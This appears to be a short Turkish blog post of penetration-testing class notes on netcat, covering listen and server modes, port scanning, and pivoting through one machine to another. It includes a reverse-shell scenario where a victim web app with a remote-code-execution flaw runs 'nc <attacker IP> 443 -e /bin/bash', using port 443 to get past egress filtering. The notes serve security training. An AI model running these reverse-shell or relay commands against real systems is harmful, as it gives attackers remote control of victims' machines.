6 Temmuz 2011 Çarşamba

Pentest in Practice - VI: NetCat

NetCat

  • "netcat" ya da "nc" komutu
  • Portu açar = Portu dinlemeye alan bir uygulama çalıştırır.
  • DNS Cat ==> İncele!
  • Dinleme modu: $nc 10.1.1.5 99 (nc <ip> <port>)
  • Sunucu modu: nc -l -p 99 (99. portu dinlemeye aç)
  • Senaryo:
    • Kurban makinede RCE (remote code execution) zafiyeti olan bir web uygulaması var.
    • Saldırgan tarafında sunucu başlat ==> nc -l -p 443
    • Kurban makinedeki web uygulamasında ==> nc <saldırganRealIP> 443 -e /bin/bash
    • Senaryoda saldırgan makinenin NAT arkasında olmadığı düşünülüyor.
    • Kurban makinede dışarı çıkış izni olan bir port kullanmak lazım. Senaryoda bu nedenle 443 portu kullanılıyor; https için kullanılan port; genelde dışarı doğru açık olur.
  • Bir makine üzerinden başka bir makine ele geçirme ==> $nc -l -p 80 | nc 5.5.5.6 445
  • NetCat ile port tarama ==> nc -z -v <IP-aralığı>

Hiç yorum yok:

Yorum Gönder

Web Uygulama Sızma Testleri İçin Kontrol Listeleri - V

Checklist for Web App Pentesting - V 6. Veri Denetimi (Data Validation) Testleri 6.1 Girdi Denetimi Bütün girdiler denetlenmelidir....